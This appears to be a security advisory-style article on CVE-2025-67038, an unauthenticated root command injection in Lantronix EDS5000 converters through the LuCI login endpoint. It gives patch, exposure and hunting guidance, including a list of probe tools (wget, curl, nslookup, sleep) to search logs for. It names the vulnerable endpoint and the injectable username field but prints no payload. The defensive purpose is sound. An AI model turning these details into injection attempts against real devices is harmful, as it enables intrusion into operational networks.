CISA has added CVE-2025-67038 to its Known Exploited Vulnerabilities catalog after active exploitation was observed against Lantronix EDS5000 Series serial-to-IP converters. The issue is a critical command injection flaw that can allow unauthenticated attackers to execute operating system commands with root privileges.
The deadline is unusually tight: U.S. federal civilian agencies were told to remediate by June 26, 2026. That urgency makes sense. These devices sit at the edge of operational environments, bridge older serial systems into IP networks, and often remain visible long after their owners assume they are hidden behind the right boundary.
This is not just another "patch your appliance" story. Forescout says exploitation appeared in honeypot telemetry on April 5, 2026, after Lantronix had released patched firmware but before public technical details were available. In other words, attackers may have reverse-engineered the vendor patch and built an exploit before defenders had a clean public narrative to follow.
What CVE-2025-67038 does
CVE-2025-67038 affects Lantronix EDS5000 Series devices, which are serial-to-IP converters commonly used to connect legacy serial equipment to modern networks. The vulnerable path is tied to OpenWRT LuCI, the web interface used to manage device configuration.
The weakness sits in the authentication flow. After failed login attempts, the HTTP JSON-RPC module writes a log entry. The username value is concatenated into a command without proper sanitization, and that command is then executed by the system. By placing shell syntax in the username parameter, an attacker can turn a failed login attempt into root command execution.
The targeted endpoint reported by Forescout is:
/cgi-bin/luci/rpc/auth
That makes this especially dangerous for internet-exposed devices. Attackers do not need valid credentials to reach the vulnerable code path. They need reachability, a crafted request, and a device running affected firmware.
Why the timing matters
Lantronix released firmware updates on February 20, 2026. The vulnerability was later published through vulnerability databases, and Forescout detailed the broader BRIDGE:BREAK research in April. But Forescout's honeypot data shows exploitation on April 5, before its public report.
That timeline points to a hard operational reality: patch diffing is enough for capable attackers. When a vendor ships a fix for an edge device, defenders should assume motivated actors may compare firmware versions, identify the changed code path, and develop a working exploit before many asset owners even know the affected device exists in their environment.
This is particularly painful for OT security. Serial-to-IP converters are often treated as infrastructure plumbing. They may support industrial controllers, building systems, medical equipment, energy operations, or remote management workflows. Because they are not always owned by the same team that owns servers and endpoints, they can fall between patch processes.
What exploitation looked like
Forescout tracks the observed activity as Chaya_006, an unattributed cluster targeting Lantronix devices. The activity included reconnaissance against LuCI paths and command injection tests using the username parameter in authentication requests.
The reported exploit attempts used common command execution probes such as sleep commands, wget, curl, nslookup, and shell redirection. That pattern is familiar: first prove code execution, then test outbound connectivity, then determine whether the device can retrieve tooling or signal back to attacker infrastructure.
Forescout also observed more than 4,100 brute-force login attempts against OpenWRT LuCI between January 28 and June 6, alongside a broader exposure estimate of roughly 32,000 internet-facing LuCI devices. Not all of those are Lantronix systems, and some are honeypots, but the number still illustrates the attacker incentive. LuCI is a high-value management surface across many embedded and edge platforms.
Why edge devices keep becoming initial access
Edge devices give attackers three things defenders hate: reachability, privilege, and poor visibility.
A successful exploit against an appliance or embedded management interface may not trigger the same telemetry as a compromised workstation. There may be no EDR agent, no rich process logging, and no central team reviewing authentication anomalies. If the device has network reach into sensitive segments, compromise can become a quiet bridge into more important systems.
The Lantronix case is also a reminder that "small" infrastructure can carry large blast radius. A serial-to-IP converter may look unimportant in an asset inventory, but it can sit next to operational processes that are expensive, fragile, or safety-sensitive. Root access on that device can support persistence, reconnaissance, traffic interception, or pivoting.
Immediate actions
1. Patch Lantronix EDS5000 devices
Upgrade affected EDS5000 devices to the fixed firmware. Lantronix released 2.2.0R1 for the EDS5000 series. Forescout also notes 3.2.0.0R2 for EDS3000 series devices addressed related BRIDGE:BREAK issues.
2. Remove direct internet exposure
Management interfaces for serial-to-IP converters should not be reachable from the public internet. Place access behind a VPN, ZTNA broker, jump host, or tightly scoped management network. If exposure is unavoidable during a transition, monitor it as an emergency exception.
3. Hunt for LuCI exploitation attempts
Review web, firewall, reverse proxy, and packet logs for requests to:
/cgi-bin/luci/rpc/auth
Look for suspicious username values containing shell syntax, command substitution, sleep probes, wget, curl, nslookup, outbound callbacks, or encoded payloads. Failed authentication logs may be more important than successful login logs in this case.
4. Rotate weak or default credentials
Forescout observed broad brute-force activity against OpenWRT LuCI. Even after patching CVE-2025-67038, default or weak credentials remain a separate path into device management.
5. Segment operational networks
Serial-to-IP converters should not have broad east-west access. Limit what they can reach, restrict who can manage them, and monitor for unexpected outbound traffic. Network segmentation is not a substitute for patching, but it reduces what an attacker can do after compromise.
Strategic takeaway
The defender's clock starts when the patch ships, not when the blog post appears. CVE-2025-67038 shows how quickly attackers can move from firmware changes to working exploitation, especially on edge and OT-adjacent devices with exposed management interfaces.
Organizations should treat device firmware releases as security signals, not just maintenance notes. For internet-facing appliances, routers, gateways, serial converters, and other embedded systems, the safe default is simple: inventory fast, patch fast, restrict management access, and assume public disclosure may not be the first time attackers learn the bug exists.
What is CVE-2025-67038?
CVE-2025-67038 is a critical OS command injection vulnerability affecting Lantronix EDS5000 Series serial-to-IP converters. It can allow unauthenticated attackers to execute commands as root through a LuCI authentication path.
Is CVE-2025-67038 being exploited?
Yes. CISA added it to the Known Exploited Vulnerabilities catalog, and Forescout reported honeypot exploitation activity beginning on April 5, 2026.
What should organizations patch?
Lantronix EDS5000 devices should be upgraded to fixed firmware, including EDS5000 firmware 2.2.0R1. Asset owners should also review related BRIDGE:BREAK advisories for other affected Lantronix and Silex devices.
Why does this matter beyond Lantronix?
The vulnerable surface is tied to OpenWRT LuCI, a management interface used across many embedded devices. The incident highlights broader risk around internet-exposed device management planes, weak credentials, and OT-adjacent edge infrastructure.
